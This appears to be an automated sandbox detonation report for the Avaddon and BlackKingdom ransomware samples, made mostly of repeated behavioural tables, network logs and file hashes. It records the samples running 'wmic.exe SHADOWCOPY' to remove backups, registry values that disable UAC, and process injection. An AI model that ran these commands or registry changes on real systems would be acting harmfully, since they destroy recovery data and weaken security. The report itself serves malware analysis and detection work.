N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A

Suspicious use of AdjustPrivilegeToken

Description	Indicator	Process	Target
Token: SeIncreaseQuotaPrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: SeSecurityPrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: SeTakeOwnershipPrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: SeLoadDriverPrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: SeSystemProfilePrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: SeSystemtimePrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: SeProfSingleProcessPrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: SeIncBasePriorityPrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: SeCreatePagefilePrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: SeBackupPrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: SeRestorePrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: SeShutdownPrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: SeDebugPrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: SeSystemEnvironmentPrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: SeRemoteShutdownPrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: SeUndockPrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: SeManageVolumePrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: 33	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: 34	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: 35	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: 36	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: SeIncreaseQuotaPrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: SeSecurityPrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: SeTakeOwnershipPrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: SeLoadDriverPrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: SeSystemProfilePrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: SeSystemtimePrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: SeProfSingleProcessPrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: SeIncBasePriorityPrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: SeCreatePagefilePrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: SeBackupPrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: SeRestorePrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: SeShutdownPrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: SeDebugPrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: SeSystemEnvironmentPrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: SeRemoteShutdownPrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: SeUndockPrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: SeManageVolumePrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: 33	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: 34	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: 35	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: 36	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: SeIncreaseQuotaPrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: SeSecurityPrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: SeTakeOwnershipPrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: SeLoadDriverPrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: SeSystemProfilePrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: SeSystemtimePrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: SeProfSingleProcessPrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: SeIncBasePriorityPrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: SeCreatePagefilePrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: SeBackupPrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: SeRestorePrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: SeShutdownPrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: SeDebugPrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: SeSystemEnvironmentPrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: SeRemoteShutdownPrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: SeUndockPrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: SeManageVolumePrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: 33	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: 34	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: 35	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: 36	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A

Suspicious use of WriteProcessMemory

Description	Indicator	Process	Target
PID 2496 wrote to memory of 1108	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	C:\Windows\SysWOW64\Wbem\wmic.exe
PID 2496 wrote to memory of 1108	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	C:\Windows\SysWOW64\Wbem\wmic.exe
PID 2496 wrote to memory of 1108	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	C:\Windows\SysWOW64\Wbem\wmic.exe
PID 2496 wrote to memory of 4984	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	C:\Windows\SysWOW64\Wbem\wmic.exe
PID 2496 wrote to memory of 4984	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	C:\Windows\SysWOW64\Wbem\wmic.exe
PID 2496 wrote to memory of 4984	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	C:\Windows\SysWOW64\Wbem\wmic.exe
PID 2496 wrote to memory of 4516	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	C:\Windows\SysWOW64\Wbem\wmic.exe
PID 2496 wrote to memory of 4516	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	C:\Windows\SysWOW64\Wbem\wmic.exe
PID 2496 wrote to memory of 4516	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	C:\Windows\SysWOW64\Wbem\wmic.exe

System policy modification

evasion

Description	Indicator	Process	Target
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe"

C:\Windows\SysWOW64\Wbem\wmic.exe

wmic.exe SHADOWCOPY /nointeractive

C:\Windows\SysWOW64\Wbem\wmic.exe

wmic.exe SHADOWCOPY /nointeractive

C:\Windows\SysWOW64\Wbem\wmic.exe

wmic.exe SHADOWCOPY /nointeractive

Network

Country	Destination	Domain	Proto
US	8.8.8.8:53	8.8.8.8.in-addr.arpa	udp
US	8.8.8.8:53	154.239.44.20.in-addr.arpa	udp
US	8.8.8.8:53	240.221.184.93.in-addr.arpa	udp
US	8.8.8.8:53	136.32.126.40.in-addr.arpa	udp
US	8.8.8.8:53	g.bing.com	udp
US	204.79.197.237:443	g.bing.com	tcp
US	8.8.8.8:53	237.197.79.204.in-addr.arpa	udp
US	8.8.8.8:53	api.myip.com	udp
US	104.26.8.59:443	api.myip.com	tcp
US	8.8.8.8:53	59.8.26.104.in-addr.arpa	udp
US	8.8.8.8:53	x2.c.lencr.org	udp
GB	184.25.193.61:80	x2.c.lencr.org	tcp
US	8.8.8.8:53	61.193.25.184.in-addr.arpa	udp
N/A	10.127.0.1:445		tcp
N/A	10.127.0.1:139		tcp
US	8.8.8.8:53	241.150.49.20.in-addr.arpa	udp
US	8.8.8.8:53	228.249.119.40.in-addr.arpa	udp
US	8.8.8.8:53	50.23.12.20.in-addr.arpa	udp
US	8.8.8.8:53	15.164.165.52.in-addr.arpa	udp
US	8.8.8.8:53	20.58.20.217.in-addr.arpa	udp
N/A	10.127.0.2:445		tcp
N/A	10.127.0.2:139		tcp
US	8.8.8.8:53	2.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	172.214.232.199.in-addr.arpa	udp
N/A	10.127.0.3:445		tcp
N/A	10.127.0.3:139		tcp
US	8.8.8.8:53	3.0.127.10.in-addr.arpa	udp
N/A	10.127.0.4:445		tcp
N/A	10.127.0.4:139		tcp
US	8.8.8.8:53	26.35.223.20.in-addr.arpa	udp
US	8.8.8.8:53	4.0.127.10.in-addr.arpa	udp
N/A	10.127.0.5:445		tcp
N/A	10.127.0.5:139		tcp
US	8.8.8.8:53	5.0.127.10.in-addr.arpa	udp

Files

C:\Users\Admin\Desktop\824656-readme.html

MD5	715d19e9efd5d8de2c5a675267effd80
SHA1	fad8c3aa6cfce316a80aff7897f27d544a2ff258
SHA256	bc62b2f8428f32999b84129990e1d9536b8d52123e0510792f7bff397f73f068
SHA512	2848575fb3ebc73eb42c2e0bbd108bd7e752850bc98fe44a05dad92c72633c35481e37c27e8567ba75f96c4c5e094110f87657318bc13c32e2abf20d704cef07

Analysis: behavioral10

Detonation Overview

Submitted

2024-07-28 16:38

Reported

2024-07-28 16:42

Platform

win10v2004-20240709-en

Max time kernel

151s

Max time network

159s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe"

Signatures

Loads dropped DLL

Description	Indicator	Process	Target
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A

Reads user/profile data of web browsers

spyware stealer

Drops desktop.ini file(s)

Description	Indicator	Process	Target
File created	C:\Users\Admin\3D Objects\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
File created	C:\Users\Admin\Pictures\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
File created	C:\Users\Public\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
File created	C:\Users\Public\AccountPictures\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
File created	C:\Users\Admin\Desktop\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
File created	C:\Users\Admin\Downloads\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
File created	C:\Users\Admin\OneDrive\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
File created	C:\Users\Admin\Saved Games\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
File created	C:\Users\Admin\Favorites\Links\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
File created	C:\Users\Public\Desktop\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
File created	C:\Users\Public\Libraries\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
File created	C:\Users\Public\Pictures\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
File created	C:\Users\Admin\Pictures\Saved Pictures\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
File created	C:\Users\Admin\Searches\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
File created	F:\$RECYCLE.BIN\S-1-5-21-47134698-4092160662-1261813102-1000\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
File created	C:\Users\Admin\Pictures\Camera Roll\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
File created	C:\Users\Admin\Videos\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
File created	C:\Users\Public\Documents\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
File created	C:\Users\Public\Music\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
File created	C:\$Recycle.Bin\S-1-5-21-47134698-4092160662-1261813102-1000\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
File created	C:\Users\Admin\Contacts\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
File created	C:\Users\Admin\Favorites\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
File created	C:\Users\Admin\Music\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
File created	C:\Users\Public\Videos\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
File created	C:\Users\Admin\Documents\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
File created	C:\Users\Public\Downloads\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
File created	C:\Users\Admin\Links\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A

Suspicious behavior: EnumeratesProcesses

Description	Indicator	Process	Target
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A

Suspicious use of AdjustPrivilegeToken

Description	Indicator	Process	Target
Token: 35	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
Token: SeDebugPrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeBackupPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
Token: SeSecurityPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
Token: SeSecurityPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
Token: SeBackupPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
Token: SeSecurityPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
Token: SeBackupPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
Token: SeSecurityPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A

Suspicious use of SetWindowsHookEx

Description	Indicator	Process	Target
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A

Suspicious use of WriteProcessMemory

Description	Indicator	Process	Target
PID 3248 wrote to memory of 608	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe
PID 3248 wrote to memory of 608	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe
PID 608 wrote to memory of 2548	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	C:\Windows\system32\cmd.exe
PID 608 wrote to memory of 2548	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	C:\Windows\system32\cmd.exe
PID 2548 wrote to memory of 2260	N/A	C:\Windows\system32\cmd.exe	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2548 wrote to memory of 2260	N/A	C:\Windows\system32\cmd.exe	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
